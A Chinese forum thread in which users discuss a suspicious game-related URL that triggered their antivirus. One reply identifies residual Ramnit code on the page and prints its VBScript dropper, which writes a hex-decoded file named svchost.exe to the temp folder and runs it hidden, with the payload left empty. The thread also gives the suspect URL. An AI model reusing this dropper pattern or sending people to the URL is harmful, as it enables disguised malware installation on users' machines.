因受伤在家休养玩传奇，在一个群里有个人发个网址点了就报毒了

lcg888

谁有这版本http://www.777777777.net:6677/有的带价

你们一定要在有杀软的情况下打开此网址啊
你们一定要在有杀软的情况下打开此网址啊
你们一定要在有杀软的情况下打开此网址啊

在交流群里有人发这么一个网址，我好奇点击去看看吧。 结果火绒拦截了，第一次知道点击一个网址电脑还能中招。
此时此刻我在杀毒，我也不敢重启 因为我怕重启开不了机或者引起其他什么情况

上传不了图，有人给分析一下吗？

dsb2468

算是误报了，这个网页后面有个残存的被杀软修复过的Ramnit代码，已经没有危害了

[Visual Basic] 纯文本查看 复制代码

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = 
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

lcg888

yljniubi666 发表于 2022-8-27 17:06
我擦，幸好开着火绒，不然就中了。我也是第一次见到这种病毒，有点好玩。

是啊，我也是互联网十来二十年第一次遇到电脑上打开网址就中招的。  我也是火绒拦截掉了，但是不放心的去查杀一下吧，结果C盘中招然后D盘中招59个文件中招  你也查杀一下吧

yljniubi666

我擦，幸好开着火绒，不然就中了。我也是第一次见到这种病毒，有点好玩。

yljniubi666

lcg888 发表于 2022-8-27 17:13
是啊，我也是互联网十来二十年第一次遇到电脑上打开网址就中招的。  我也是火绒拦截掉了，但是不放心的去 ...

我查了，没有中招。那些病毒应该是你之前就中了

lcg888

yljniubi666 发表于 2022-8-27 20:24
我查了，没有中招。那些病毒应该是你之前就中了

不是的不是的 我天天查毒，我说的59个中招的 都是跟拦截的病毒名称一模一样

yljniubi666

lcg888 发表于 2022-8-27 21:06
不是的不是的 我天天查毒，我说的59个中招的 都是跟拦截的病毒名称一模一样

我又查了一遍，真没有。是不是你火绒没开全？我就只关了应用联网监控，其他都开了

lcg888

yljniubi666 发表于 2022-8-28 19:05
我又查了一遍，真没有。是不是你火绒没开全？我就只关了应用联网监控，其他都开了

没全开........................................  全开影响很多东西操作 所以没全开

lcg888

dsb2468 发表于 2022-8-29 14:18
算是误报了，这个网页后面有个残存的被杀软修复过的Ramnit代码，已经没有危害了

[mw_shl_code=vb,true][ ...

我说咋回事，这是人生中第一次遇到PC端点 就点击个网址就中招的。感觉很不可思议万分感谢 大佬的解答这下我就放心了。

Hack3rHan

只要你浏览器版本不太老，绝大部分情况下点个网址还是不至于直接中招的。